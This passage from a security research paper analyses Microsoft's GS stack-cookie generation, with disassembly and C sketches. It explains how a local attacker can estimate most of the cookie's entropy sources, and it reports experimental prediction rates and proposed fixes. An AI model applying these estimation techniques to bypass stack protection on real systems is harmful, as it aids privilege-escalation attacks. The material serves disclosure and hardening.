a mismatch is detected, steps can be taken to securely terminate the process
in a way that will prevent exploitation.
The security of a cookie-based solution hinges on the fact that an attacker
doesn't know, or is unable to generate, the cookie that is stored in a stack
frame. Since it's impossible to guarantee in all situations that an attacker
won't be able to generate the bytes that compose the value of a cookie, it
really all boils down to the cookie being kept secret. If the cookie is not
kept secret, then the presence of a cookie will provide no protection when it
comes to exploiting a stack-based buffer overflow vulnerability.
Additionally, if an attacker can trigger an exploitable condition before the
cookie is checked, then it stands that the cookie will provide no protection.
One example of this might include overwriting a function pointer on the stack
that is called prior to returning from the function.
While the StackGuard and ProPolice implementations are interesting and useful,
the author feels that no implementation is more critical than the one provided
by Microsoft. The reason for this is the simple fact that the vast majority
of all desktops, and a non-trivial number of servers, run applications
compiled with Microsoft's Visual C compiler. Any one weakness found in the
Microsoft's implementation could mean that a large number of applications are
no longer protected against stack-based buffer overflows. In fact, there has
been previous research that has pointed out flaws or limitations in
Microsoft's implementation. For example, David Litchfield pointed out that
even though stack cookies are present, it may still be possible to overwrite
exception registration records on the stack which may be called before the
function actually returns. This discovery was one of the reasons that
Microsoft later introduced SafeSEH (which had its own set of issues)[6].
Similarly, Chris Ren et al from Cigital pointed out the potential implications
of a function pointer being used in the path of the error handler for the case
of a GS cookie mismatch occurring[9]. While not directly related to a particular
flaw or limitation in GS, eEye has described some of the problems that come
when secrets get leaked[3].
Even though these issues and limitations have existed, Microsoft's GS
implementation at the time of this writing is considered by most to be secure.
While this paper will not present a complete break of Microsoft's GS
implementation, it will describe certain quirks and scenarios that may make it
possible to reduce the amount of effective entropy that exists in the cookies
that are generated. As with cryptography, any reduction of the entropy that
exists in the GS cookie effectively makes it so there are fewer unknown
portions of the cookie. This makes the cookie easier to guess by reducing the
total number of possibilities. Beyond this, it is expected that additional
research may find ways to further reduce the amount of entropy beyond that
described in this document. One critical point that must be made is that
since the current GS implementation is statically linked when binaries are
compiled, any flaw that is found in the implementation will require a
recompilation of all binaries affected by it. To help limit the scope, only
the 32-bit version of GS will be analyzed, though it is thought that similar
attacks may exist on the 64-bit version as well.
The structure of this paper is as follows. In chapter 3, a brief description
of the Microsoft's current GS implementation will be given. Chapter 4 will
describe some techniques that may be used to attack this implementation.
Chapter 5 will provide experimental results from using the attacks that are
described in chapter 4. Chapter 6 will discuss steps that could be taken to
improve the current GS implementation. Finally, chapter 7 will discuss some
areas where future work could be applied to further improve on the techniques
described in this document.
3) Implementation
As was mentioned in the introduction, security solutions that are designed to
protect against stack-based buffer overflows through the use of cookies tend
to involve three distinct steps: cookie generation, prologue modifications,
and epilogue modifications. Microsoft's GS implementation is no different.
This chapter will describe each of these three steps independent of one
another to paint a picture for how GS operates.
3.1) Cookie Generation
Microsoft chose to have the GS implementation generate an image file-specific
cookie. This means that each image file (executable or DLL) will have its
own unique cookie. When used in conjunction with a stack frame, a function
will insert its image file-specific cookie into the stack frame. This will be
covered in more detail in the next section. The actual approach taken to
generate an image file's cookie lives in a compiler inserted routine called
__security_init_cookie. This routine is placed prior to the call to the image
file's actual entry point routine and therefore is one of the first things
executed. By placing it at this point, all of the image file's code will be
protected by the GS cookie.
The guts of the __security_init_cookie routine are actually the most critical part
to understand. At a high-level, this routine will take an XOR'd combination
of the current system time, process identifier, thread identifier, tick count,
and performance counter. The end result of XOR'ing these values together is
what ends up being the image file's security cookie. To understand how this
actually works in more detail, consider the following disassembly from an
application compiled with version 14.00.50727.42 of Microsoft's compiler.
Going straight to the disassembly is the best way to concretely understand the
implementation, especially if one is in search of weaknesses.
Like all functions, the __security_init_cookie function starts with a prologue.
It allocates storage for some local variables and initializes some of them to
zero. It also initializes some registers, specifically edi and ebx which will
be used later on.
.text:00403D58 push ebp
.text:00403D59 mov ebp, esp
.text:00403D5B sub esp, 10h
.text:00403D5E mov eax, __security_cookie
.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0
.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0
.text:00403D6B push ebx
.text:00403D6C push edi
.text:00403D6D mov edi, 0BB40E64Eh
.text:00403D72 cmp eax, edi
.text:00403D74 mov ebx, 0FFFF0000h
As part of the end of the code above, a comparison between the current
security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie
is called, the global __security_cookie is initialized to 0xbb40e64e. The
constant comparison is used to see if the GS cookie has already been
initialized. If the current cookie is equal to the constant, or the high
order two bytes of the current cookie are zero, then a new cookie is
generated. Otherwise, the complement of the current cookie is calculated and
cookie generation is skipped.
.text:00403D79 jz short loc_403D88
.text:00403D7B test eax, ebx
.text:00403D7D jz short loc_403D88
.text:00403D7F not eax
.text:00403D81 mov __security_cookie_complement, eax
.text:00403D86 jmp short loc_403DE8
To generate a new cookie, the function starts by querying the current system
time using GetSystemTimeAsFileTime. The system time as represented by Windows
is a 64-bit integer that measures the system time down to a granularity of 100
nanoseconds. The high order 32-bit integer and the low order 32-bit integer
are XOR'd together to produce the first component of the cookie. Following
that, the current process identifier is queried using GetCurrentProcessId and
then XOR'd as the second component of the cookie. The current thread
identifier is then queried using GetCurrentThreadId and then XOR'd as the
third component of the cookie. The current tick count is queried using
GetTickCount and then XOR'd as the fourth component of the cookie. Finally,
the current performance counter value is queried using
QueryPerformanceCounter. Like system time, this value is also a 64-bit
integer, and its high order 32-bit integer and low order 32-bit integer are
XOR'd as the fifth component of the cookie. Once these XOR operations have
completed, a comparison is made between the newly generated cookie value and
the constant 0xbb40e64e. If the new cookie is not equal to the constant
value, then a second check is made to make sure that the high order two bytes
of the cookie are non-zero. If they are zero, then the cookie is OR'd with a
16-bit left shift of itself (shl eax, 10h) in order to seed the high order
bytes.
.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime]
.text:00403D8C push eax
.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4
.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime]
.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime]
.text:00403D99 call ds:__imp__GetCurrentProcessId@0
.text:00403D9F xor esi, eax
.text:00403DA1 call ds:__imp__GetCurrentThreadId@0
.text:00403DA7 xor esi, eax
.text:00403DA9 call ds:__imp__GetTickCount@0
.text:00403DAF xor esi, eax
.text:00403DB1 lea eax, [ebp+PerformanceCount]
.text:00403DB4 push eax
.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4
.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4]
.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount]
.text:00403DC1 xor esi, eax
.text:00403DC3 cmp esi, edi
.text:00403DC5 jnz short loc_403DCE
...
.text:00403DCE loc_403DCE:
.text:00403DCE test esi, ebx
.text:00403DD0 jnz short loc_403DD9
.text:00403DD2 mov eax, esi
.text:00403DD4 shl eax, 10h
.text:00403DD7 or esi, eax
Finally, when a valid cookie is generated, it's stored in the image file's
__security_cookie. The bit-wise complement of the cookie is also stored in
__security_cookie_complement. The reason for the existence of the complement
will be described later.
.text:00403DD9 mov __security_cookie, esi
.text:00403DDF not esi
.text:00403DE1 mov __security_cookie_complement, esi
.text:00403DE7 pop esi
.text:00403DE8 pop edi
.text:00403DE9 pop ebx
.text:00403DEA leave
.text:00403DEB retn
In simpler terms, the meat of the cookie generation can basically be
summarized through the following pseudo code:
Cookie = SystemTimeHigh
Cookie ^= SystemTimeLow
Cookie ^= ProcessId
Cookie ^= ThreadId
Cookie ^= TickCount
Cookie ^= PerformanceCounterHigh
Cookie ^= PerformanceCounterLow
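As a sketch, the generation logic above can be modeled in C as follows. All
input values are hypothetical stand-ins for the real system state, and the
elided path taken when the cookie equals the constant is not modeled:

```c
#include <assert.h>
#include <stdint.h>

/* The constant that __security_init_cookie compares against. */
#define DEFAULT_COOKIE 0xBB40E64Eu

/* Model of the XOR accumulation and post-processing shown in the
 * disassembly above. All arguments are hypothetical sample values. */
uint32_t generate_cookie(uint32_t time_hi, uint32_t time_lo,
                         uint32_t pid, uint32_t tid, uint32_t ticks,
                         uint32_t perf_hi, uint32_t perf_lo)
{
    uint32_t cookie = time_hi ^ time_lo ^ pid ^ tid ^
                      ticks ^ perf_hi ^ perf_lo;

    /* If the high order two bytes are zero, OR in a 16 bit left shift
     * of the cookie to seed them (shl eax, 10h / or esi, eax). */
    if (cookie != DEFAULT_COOKIE && (cookie & 0xFFFF0000u) == 0)
        cookie |= cookie << 16;

    return cookie;
}
```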
3.2) Prologue Modifications
In order to make use of the generated cookie, functions must be modified to
insert it into the stack frame at the time that they are called. This does
add some overhead to the call time associated with a function, but its overall
effect is linear with respect to a single invocation. The actual
modifications that are made to a function's prologue typically involve just
three instructions. The cookie that was generated for the image file is XOR'd
with the current value of the frame pointer. This value is then placed in the
current stack frame at a precisely chosen location by the compiler.
.text:0040214B mov eax, __security_cookie
.text:00402150 xor eax, ebp
.text:00402152 mov [ebp+2A8h+var_4], eax
It should be noted that Microsoft has taken great care to refine the way a
stack frame is laid out in the presence of GS. Locally defined pointers,
including function pointers, are placed before statically sized buffers in the
stack frame. Additionally, dangerous input parameters passed to the function,
such as pointers or structures that contain pointers, will have local copies
made that are positioned before statically sized local buffers. The local
copies of these parameters are used instead of those originally passed to the
function. These two changes go a long way toward helping to prevent other
scenarios in which stack-based buffer overflows might be exploited.
3.3) Epilogue Modifications
When a function returns, it must check to make sure that the cookie that was
stored on the stack has not been tampered with. To accomplish this, the
compiler inserts the following instructions into a function's epilogue:
.text:00402223 mov ecx, [ebp+2A8h+var_4]
.text:00402229 xor ecx, ebp
.text:0040222B pop esi
.text:0040222C call __security_check_cookie
The value of the cookie that was stored on the stack is moved into ecx and
then XOR'd with the current frame pointer to get it back to the expected
value. Following that, a call is made to __security_check_cookie with the
stack frame's cookie value passed in the ecx register. The
__security_check_cookie routine is very short and sweet. The passed in cookie
value is compared with the image file's global cookie. If they don't match,
__report_gsfailure is called and the process eventually terminates. This is
what one would expect
in the case of a buffer overflow scenario. However, if they do match, the
routine simply returns, allowing the calling function to proceed with
execution and cleanup.
.text:0040634B cmp ecx, __security_cookie
.text:00406351 jnz short loc_406355
.text:00406353 rep retn
.text:00406355 loc_406355:
.text:00406355 jmp __report_gsfailure
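The prologue/epilogue pair can be sketched in C as below. The variable and
function names are the author's own illustrative choices, not Microsoft's:

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical process-wide cookie for the image file. */
static uint32_t security_cookie = 0xA1B2C3D4u;

/* Prologue: the value actually written into the stack frame slot. */
uint32_t frame_cookie(uint32_t frame_pointer)
{
    return security_cookie ^ frame_pointer;
}

/* Epilogue: XOR with the frame pointer restores the expected value; a
 * mismatch models the path that ends in __report_gsfailure. */
int check_cookie(uint32_t stored, uint32_t frame_pointer)
{
    return (stored ^ frame_pointer) == security_cookie;
}
```

Note that because the stored value is tied to the frame pointer, the same
process-wide cookie yields different on-stack values in different frames.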
4) Attacking GS
At the time of this writing, all publicly disclosed attacks against GS that
the author is aware of have relied on getting control of execution before the
cookie is checked or by finding some way to leak the value of the cookie back
to the attacker. Both of these styles of attack are of great interest and
value, but the focus of this paper will be on a different method of attacking
GS. Specifically, this chapter will outline techniques that may be used to
make it easier to guess the value an image file's GS cookie. Two techniques
will be described. The first technique will describe methods for calculating
the values that were used as entropy sources when the cookie was generated.
These calculations are possible in situations where an attacker has local
access to the machine, such as through the console or through terminal
services. The second technique describes the general concept of predictable
ranges of some values that are used in the context of boot start services,
such as lsass.exe. This predictability may make the guessing of a GS cookie
more feasible in both local and remote scenarios.
4.1) Calculating Entropy Sources
The sources used to generate the GS cookie for a given image file are constant
and well-known. They include the current system time, process identifier,
thread identifier, tick count, and performance counter. In light of that
fact, it only makes sense to investigate the amount of effective entropy each
source adds to the cookie. Since it's a requirement that the cookie produced
be secret, the ability to guess a value used in the generation of the cookie
will allow it to be canceled out of the equation. This is true due to the
simple fact that each of the values used to generate the cookie is XOR'd with
each other value (XOR is a commutative operation). The ability to guess
multiple values can make it possible to seriously impact the overall integrity
of the cookie.
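The cancellation property can be demonstrated directly. Since XOR is
commutative and self-inverse, XORing every component an attacker can
calculate back out of the cookie leaves only the components that remain
unknown:

```c
#include <assert.h>
#include <stdint.h>

/* XOR each known component back out of the cookie; whatever remains is
 * the contribution of the components the attacker could not calculate. */
uint32_t cancel_known(uint32_t cookie, const uint32_t known[], int count)
{
    for (int i = 0; i < count; i++)
        cookie ^= known[i];
    return cookie;
}
```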
While the sources used in the generation of the cookie have long been regarded
as satisfactory, the author has found that the majority of the sources
actually contribute little to no value toward the overall entropy of the
cookie. However, this is currently only true if an attacker has local access
to the machine. Being able to know a GS cookie that was used in a privileged
process would make it possible to exploit a local privilege escalation
vulnerability, for example. There may be some circumstances where the
techniques described in this section could be applied remotely, but for the
purpose of this document, only the local scenario will be considered. The
following subsections will outline methods that can be used to calculate or
deterministically find the specific values that were used when a cookie was
being generated in a particular process context. As a result of this
analysis, it's become clear that the only particular variable source of true
entropy for the GS cookie is the low 17 bits of the performance counter. All
other sources can be reliably calculated, with some margin of error.
For the following subsections, a modified executable named vulnapp.exe was
used to extract the information that was used at the time that a process
executable's GS cookie was generated. In particular, __security_init_cookie was
modified to jump into a function that saves the information used to generate
the cookie. The implementation of this function is shown below for those who
are curious:
//
// The FramePointer is the value of EBP in the context of the
// __security_init_cookie routine. The cookie is the actual,
// resultant cookie value. GSContext is a global array.
//
VOID DumpInformation(
PULONG FramePointer,
ULONG Cookie)
{
GSContext[0] = FramePointer[-3];
GSContext[1] = FramePointer[-4];
GSContext[2] = FramePointer[-1];
GSContext[3] = FramePointer[-2];
GSContext[4] = GetCurrentProcessId();
GSContext[5] = GetCurrentThreadId();
GSContext[6] = GetTickCount();
GSContext[7] = Cookie;
}
4.1.1) System Time
System time is a value that one might regard as challenging to recover. After
all, it seems impossible to get the 100 nanosecond granularity of the system
time that was retrieved when a cookie was being generated. Quite the
contrary, actually. There are a few key points that go into being able to
recover the system time. First, it's a fact that even though the system time
measures granularity in terms of 100 nanosecond intervals, it's really only
updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs).
To many, 15.625 may seem like an odd number, but for those familiar with the
Windows thread scheduler, it can be recognized as the period of the timer
interrupt. For that reason, the current system time is only updated as a
result of the timer interrupt firing. This fact means that the alignment of
the system time that is used when a cookie is generated is known.
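Since the system time only advances when the timer interrupt fires, any
FILETIME-style value it yields is aligned to the interrupt period. A sketch,
assuming the 15.625 millisecond period (156250 hundred-nanosecond units):

```c
#include <assert.h>
#include <stdint.h>

/* 15.625 milliseconds expressed in 100 nanosecond units. */
#define TIMER_PERIOD_100NS 156250ULL

/* Round a 64-bit system time value down to the timer interrupt boundary
 * on which it would have been sampled. */
uint64_t align_to_timer_tick(uint64_t filetime)
{
    return filetime - (filetime % TIMER_PERIOD_100NS);
}
```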
Of more interest, though, is the relationship between the system time value
and the creation time value associated with a process or its initial thread.
Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds,
it follows that the granularity of the thread creation time will be the same.
In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long
for the processor to execute all instructions from the creation of the thread
to the generation of the security cookie. This fact means that it's
possible to assume that the creation time of a process or thread is the
same as the system time that was used when the cookie was generated. This
assumption doesn't always work, though, and there are indeed cases where
the creation time will not equal the system time that was used. These
situations are usually a result of the thread that creates the cookie not
being immediately scheduled.
Even if this is the case, it would be necessary to be able to obtain the
creation time of an arbitrary process or thread. On the surface, this would
seem impossible because task manager prevents a non-privileged user from
getting the start time of a privileged process.
This is all a deception, though, because there does exist functionality that
is exposed to non-privileged users that can be used to get this information.
One way of getting it is through the use of the native API routine
NtQuerySystemInformation. In this case, the
SystemProcessesAndThreadsInformation system information class is used to query
information about all of the running processes on the system. This
information includes the process name, process creation time, and the creation
time for each thread in each process. While this information class has been
removed in Windows Vista, there are still potential ways of obtaining the
creation time information. For example, an attacker could simply crash the
vulnerable service once (assuming it's not a critical service) and then wait
for it to respawn. Once it respawns, the creation time can be inferred based
on the restart delay of the service. Granted, service restarts are limited
to three times per day in Vista, but crashing it once should cause no major
issues.
Using NtQuerySystemInformation, it's possible to collect some data that can be
used to determine the likelihood that the creation time of a thread will be
equal to the system time that was used when a GS cookie was generated. To
test this, the author used the modified vulnapp.exe executable to extract the
system time at the time that the cookie was generated. Following that, a
separate program was used to collect the creation time information of the
process in question using the native API. The initial thread's creation time
was then compared with the system time to see if they were equal. The
creation time and system time were often equal in a sample of 742 cookies.
Obviously, the data set describing differences is only relevant to a
particular system load. If there are many threads waiting to run during the
time that a process is executed, then it is unlikely that the system time will
equal the process creation time. In a desktop environment, it's probably safe
to assume that the thread will run immediately, but more conclusive evidence
may be necessary.
Given these facts, it is apparent that the complete 64-bit system time value
can be recovered more often than not with a great degree of accuracy just by
simply assuming that thread creation time is the same as the system time
value.
4.1.2) Process and Thread Identifier
The process and thread identifier are arguably the worst sources of entropy
for the GS cookie, at least in the context of a local attack. The two high
order bytes of the process and thread identifiers are almost always zero.
This means they have absolutely no effect on the high order entropy.
Additionally, the process and thread identifier can be determined with 100
percent accuracy in a local context using the same API described in the
previous section on getting the system time. This involves making use of
the NtQuerySystemInformation native API with the
SystemProcessesAndThreadsInformation system information class to get the
process identifier and thread identifier associated with a given process
executable.
The end result, obviously, is that the process and thread identifier can be
determined with great accuracy. The one exception to this rule would be
Windows Vista, but, as was mentioned before, alternative methods of obtaining
the process and thread identifier may exist.
4.1.3) Tick Count
The tick count is, for all intents and purposes, simply another measure of
time. When the GetTickCount API routine is called, the number of ticks is
multiplied by the tick count multiplier. This multiplication effectively
translates the number of ticks to the number of milliseconds that the system
has been up. If one can safely assume that the system time used to
generate the cookie was the same as the thread creation time, then the tick
count at the time that the cookie was generated can simply be calculated using
the thread creation time. The creation time isn't enough, though. Since the
GetTickCount value measures the number of milliseconds that have occurred
since boot, the actual uptime of the system has to be determined.
To determine the system uptime, a non-privileged user can again make use of
the NtQuerySystemInformation native API, this time with the
SystemTimeOfDayInformation system information class. This query returns the
time that the system was booted as a 64-bit integer measured in 100 nanosecond
intervals, just like the thread creation time. To calculate the system uptime
in milliseconds, it's as simple as subtracting the boot time from the creation
time and then dividing by 10000 to convert from 100 nanosecond intervals to 1
millisecond intervals:
EstTickCount = (CreationTime - BootTime) / 10000
Some experimentation shows that this calculation is pretty accurate, but some
quantity is lost in translation. From what the author has observed, a
constant scaling factor of 0x4e, or 78 milliseconds, needs to be added to the
result of this calculation. The source of this constant is as yet unknown,
but it appears to be a required constant. This results in the actual equation
being:
EstTickCount = [(CreationTime - BootTime) / 10000] + 78
The end result is that the tick count can be calculated with a great degree of
accuracy. If the system time calculation is off, then that will directly
affect the calculation of the tick count.
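The tick count estimation above can be sketched directly from the equation.
Both inputs are in 100 nanosecond units as returned by the native API, and
the +78 millisecond term is the empirically observed constant described
above:

```c
#include <assert.h>
#include <stdint.h>

/* EstTickCount = [(CreationTime - BootTime) / 10000] + 78, where both
 * times are 64-bit values measured in 100 nanosecond intervals. */
uint32_t est_tick_count(uint64_t creation_time, uint64_t boot_time)
{
    return (uint32_t)((creation_time - boot_time) / 10000ULL) + 78u;
}
```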
4.1.4) Performance Counter
Of the four entropy sources discussed so far, the performance counter is the
only one that really presents a challenge. The purpose of the performance
counter is to describe the total number of cycles that have executed. On the
outside, the performance counter would seem impossible to reliably determine.
After all, how could one possibly determine the precise number of cycles that
had occurred as a cookie was being generated? The answer, of course, comes
down to the fact that the performance counter itself is, for all intents and
purposes, just another measure of time. Windows provides two interesting
user-mode APIs that deal with the performance counter. The first,
QueryPerformanceCounter, is used to ask the kernel to read the current value
of the performance counter[8]. The result of this query is stored in the 64-bit
output parameter that the caller provides. The second API is
QueryPerformanceFrequency. This routine is interesting because it returns a
value that describes the amount that the performance counter will change in
one second[7]. Documentation indicates that the frequency cannot change while
the system is booted.
Using the existing knowledge about the uptime of the system and the
calculation that can be performed to convert between the performance counter
value and seconds, it is possible to fairly accurately guess what the
performance counter was at the time that the cookie was generated. Granted,
this method is more fuzzy than the previously described methods, as
experimental results have shown a large degree of fluctuation in the lower 17
bits. Those results will be discussed in more detail in chapter 5. The actual
equation that can be used to generate the estimated performance counter is to
take the uptime, as measured in 100 nanosecond intervals, and multiply it by
the performance frequency divided by 10000000, which converts the frequency
from a measure of 1 second to 100 nanoseconds:
EstPerfCounter = UpTime x (PerfFreq / 10000000)
In a fashion similar to tick count, a constant scaling factor of -165000 was
determined through experimentation. This seems to produce more accurate
results in some of the 24 low bits. Based on this calculation, it's possible
to accurately determine the entire 32-bit high order integer and the first 15
bits of the 32-bit low order integer. Of course, if the system time estimate
is wrong, then that directly affects this calculation.
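A sketch of the performance counter estimate follows. The multiplication is
performed before the division so that integer truncation does not discard
the fractional counts-per-interval (a real implementation would also guard
against 64-bit overflow for very long uptimes); -165000 is the empirically
determined constant:

```c
#include <assert.h>
#include <stdint.h>

/* uptime_100ns: system uptime in 100 nanosecond units; perf_freq: counter
 * increments per second, as QueryPerformanceFrequency would report. */
int64_t est_perf_counter(int64_t uptime_100ns, int64_t perf_freq)
{
    return uptime_100ns * perf_freq / 10000000LL - 165000LL;
}
```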
4.1.5) Frame Pointer
While the frame pointer does not influence an image file's global cookie, it
does influence a stack frame's version of the cookie. For that reason, the
frame pointer must be considered as an overall contributor to the effective
entropy of the cookie. With the exception of Windows Vista, the frame pointer
should be a deterministic value that could be deduced at the time that a
vulnerability is triggered. As such, the frame pointer should be considered a
known value for the majority of stack-based buffer overflows. Granted, in
multi-threaded applications, it may be more challenging to accurately guess
the value of the frame pointer.
In the Windows Vista environment, the compile-time GS implementation gets a
boost in security due to the introduction of ASLR. This helps to ensure that
the frame pointer is actually an unknown quantity. However, it doesn't
introduce equal entropy in all bits. In particular, octet 4, and potentially
octet 3, may have predictable values due to the way that the randomization is
applied to dynamic memory allocations. In order to prevent fragmentation of
the address space, Vista's ASLR implementation attempts to ensure that stack
regions are still allocated low in the address space. This has the side
effect of ensuring that a non-trivial number of bits in the frame pointer will
be predictable. Additionally, while Vista's ASLR implementation makes an
effort to shift the lower bits of the stack pointer, there may still be some
bits that are always predictable in octet 2.
4.2) Predictability of Entropy Sources in Boot Start Services
A second attack that could be used against GS involves attacking services that
start early on when the system is booted. These services may experience more
predictable states of entropy due to the fact that the amount of time it takes
to boot up and the order in which tasks are performed is fairly, though not
entirely, consistent. This insight may make it possible to estimate the value
of entropy sources remotely.
To better understand this type of attack, the author collected 742 samples
that were taken from a custom service that was set to automatically start
during boot on a Windows XP SP2 installation. This service was simply
designed to log the state used at the time that the GS cookie was being
generated. While a sampling of the GS cookie state applied to lsass.exe would
have been more ideal, it wasn't worth the headache of having to patch a
critical system service. Perhaps the reader may find it interesting to
collect this data on their own. From the samples that were taken, the
following diagrams show the likelihood of each individual bit being set for
each of the different entropy sources.
Overall, there are a number of predictable bits in things like the high
32-bits of both the system time and the performance counter, the process
identifier, the thread identifier, and the tick count. The sources that are
largely unpredictable are the low 32-bits of the system time and the
performance counter. However, if it were possible to come up with a way to
discover the boot time (or uptime) of the system remotely, it might be
possible to infer a good portion of the low 32-bits of the system time. This
would then directly impact the ability to estimate things like the tick count
and performance counters.
5) Experimental Results
This chapter describes some of the initial results that were collected using a
utility developed by the author named gencookie.exe. This utility attempts to
calculate the value of the cookie that was generated for the executable image
associated with an arbitrary process, such as lsass.exe. While the results of
this utility were limited to attempting to calculate the cookie of a process'
executable, the techniques described in previous chapters are nonetheless
applicable to the cookies generated in the context of dependent DLLs. The
results described in this chapter illustrate the tool's ability to accurately
obtain specific bits within the different components that compose the cookie,
including specific bits of the cookie itself. This helps to paint a picture
of the amount of true entropy that is reduced through the techniques described
in this document.
The data set that was used to calculate the overall results included 5001
samples which were collected from a single machine. The samples were
collected through a few simple steps. First, a program called vulnapp.exe
that was compiled with /GS was modified to have its __security_init_cookie routine
save information about the cookie that was generated and the values that
contributed to its generation. Following that, the gencookie.exe utility was
launched against the running process in an attempt to calculate vulnapp.exe's
GS cookie. A comparison between the expected and actual value of each
component was then saved. These steps were repeated 5001 times. The author
would be interested in hearing about independent validation of the findings
presented in this chapter.
The following sections describe the bit-level predictability of each of the
components that are used to generate the GS cookie, including the overall
predictability of the bits of the GS cookie itself.
5.1) System Time
The system time component was highly predictable. The high 32 bits of the
system time were predicted with 100 percent accuracy. The low 32 bits, on
the other hand, were predicted with only 77 percent accuracy (3878 times). The
reason for this discrepancy has to do with the thread scheduling scenario
described in subsection 4.1.1. Even still, these results indicate that it is
likely that the entire system time value can be accurately calculated.
5.2) Process and Thread Identifier
The process and thread identifier were successfully calculated 100 percent of
the time using the approach outlined in section 4.1.2.
5.3) Tick Count
The tick count was accurately calculated 67 percent of the time (3396 times).
The reason for this lower rate of success is due in large part to the fact
that the tick count is calculated in relation to the estimated system time
value. As such, if an incorrect system time value is determined, the tick
count itself will be directly influenced. This should account for at least 23
percent of the inaccuracies judging from how often the system time was
inaccurately estimated. The remaining 10 percent of the inaccuracies is as of
yet undetermined, but it is most likely related to the an improper
interpretation of the constant scaling factor that is applied to the tick
count. In any case, it is expected that only a few bits are actually affected
in the remaining 10 percent of cases.
5.4) Performance Counter
The high 32-bits of the performance counter were successfully estimated 100
percent of the time. The low 32-bits, on the other hand, show the greatest
degree of volatility when compared to the other components. The high order 15
bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50
split. The remaining 17 bits were all guessed correctly roughly 50 percent of
the time. This makes the low 17 bits the only truly effective source of
entropy in the performance counter since there is no bias shown in relation to
the estimated versus actual values. Indeed, this is not enough to prove that
there aren't observable patterns in the low 17 bits, but it is enough to show
that the gencookie.exe utility was not effective in estimating them. The
per-bit accuracy measurements for the high and low order 32-bits bear this
out.
This discrepancy actually requires a more detailed explanation. In reality,
the estimates made by the gencookie.exe utility are actually not as far off as
one might think based on the percent accuracy of each bit as described in the
diagrams. Instead, the estimates are, on average, off by only 105,000. This
average difference is what leads to the lower 17 bits being so volatile. One
thing that's interesting about the difference between the estimated and actual
performance counter is that there appears to be a time oriented trend related
to how far off the estimates are. Due to the way that the samples were taken,
it's safe to assume that each sample is roughly equivalent to one second worth
of time passing (due to a sleep between sample collection). Further study of
this apparent relationship may yield better results in terms of estimating the
lower 17 bits of the low 32 bits of the performance counter. This is left for
future research.
5.5) Cookie
The cookie itself was never actually guessed during the course of sample
collection. The reason for this is tightly linked with the current inability
to accurately determine the lower 17 bits of the low 32 bits of the
performance counter. Comparing the percent accuracy of the cookie bits with
the percent accuracy of the low 32 bits of the performance counter yields a
very close match.
6) Improvements
Based on the results described in chapter 5, the author feels that there is
plenty of room for improvement in the way that GS cookies are currently
generated. It's clear that there is a need to ensure that there are 32 bits
of true entropy in the cookie. The following sections outline some potential
solutions to the entropy issue described in this document.
6.1) Better Entropy Sources
Perhaps the most obvious solution would be to simply improve the set of
entropy sources used to generate the cookie. In particular, the use of
sources with greater degrees of entropy, especially in the high order bits,
would be of great benefit. The challenge, however, is locating sources that
are easy to interact with and require very little overhead. For example, it's
not really feasible to have the GS cookie generator rely on the crypto API due
to the simple fact that this would introduce a dependency on the crypto API in
any application that was compiled with /GS. As this document has hopefully
shown, it's also a requirement that any additional entropy sources be
challenging to estimate externally at a future point in time.
Even though this is a viable solution, the author is not presently aware of
any additional entropy sources that would meet all three requirements. For
this reason, the author feels that this approach alone is insufficient to
solve the problem. If entropy sources are found which meet these
requirements, the author would love to hear about them.
6.2) Seeding High Order Bits
A more immediate solution to the problem at hand would involve simply ensuring
that the predictable high order bits are seeded with less predictable values.
However, additional entropy sources would be required in order to implement
this properly. At present, the only major source of entropy found in the GS
cookie is the low order bits of the performance counter. It would not be
sufficient to simply shift the low order bits of the performance counter into
the high order. Doing so would add absolutely no value by itself because it
would have no effect on the amount of true entropy in the cookie.
6.3) External Cookie Generation
An alternative solution that could combine the effects of the first two
solutions would be to change the GS implementation to generate the cookie
external to the binary itself. One of the most dangerous aspects of the GS
implementation is that it is statically linked and therefore would require a
recompilation of all affected binaries in the event that a weakness is found.
This fact alone should be scary. To help address both this problem and the
problem of weak entropy sources, it makes sense to consider a more dynamic
approach.
One example of a dynamic approach would be to have the GS implementation issue
a call into a kernel-mode routine that is responsible for generating GS
cookies. One place that this support could be added is in
NtQuerySystemInformation, though it's likely that a better place may exist.
Regardless of the specific routine, this approach would have the benefit of
moving the code used to generate the cookie out of the statically linked stub
that is inserted by the compiler. If any weakness were to be found in the
kernel-mode routine that generates the cookie, Microsoft could issue a patch
that would immediately affect all applications compiled to use GS. This would
solve some of the concerns relating to the static nature of GS.
Perhaps even better, this approach would grant greater flexibility to the
entropy sources that could be used in the generation of the cookie. Since the
routine would exist in kernel-mode, it would have the benefit of being able to
access additional sources of entropy that may be challenging or clumsy to
interact with from user-mode (though the counterpoint could certainly be made
as well). The kernel-mode routine could also accumulate entropy over time and
feed that back into the cookie, whereas the statically linked implementation
has no context with which to accumulate entropy. The accumulation of state
can also do more harm than good. It would be disingenuous to not admit that
this approach could also have its own set of problems. A poorly implemented
version of this solution might make it possible for a user to eliminate all
entropy by issuing a non-trivial number of calls to the kernel-mode routine.
There may be additional consequences that have not yet been perceived.
The impact on performance is also a big point of concern for any potential
change to the cookie generation path. At a high-level, a transition into
kernel-mode would seem concerning in terms of the amount of overhead that
might be added. However, it's important to note that the current
implementation of GS already transitions into kernel-mode to obtain some of
its information. Specifically, performance counter information is obtained
through the system call NtQueryPerformanceCounter. Even more, this system
call results in an 'in' instruction on an I/O port that is used to query the
current performance counter.
Another important consideration is backward compatibility. If Microsoft were
to implement this solution, it would be necessary for applications compiled
with the new support to still be able to benefit from GS on older platforms that
don't support the new kernel interface. To allow for backward compatibility,
Microsoft could implement a combination of all three solutions, whereby better
entropy sources and seeding of high order bits are used as a fallback in the
event that the kernel-mode interface is not present.
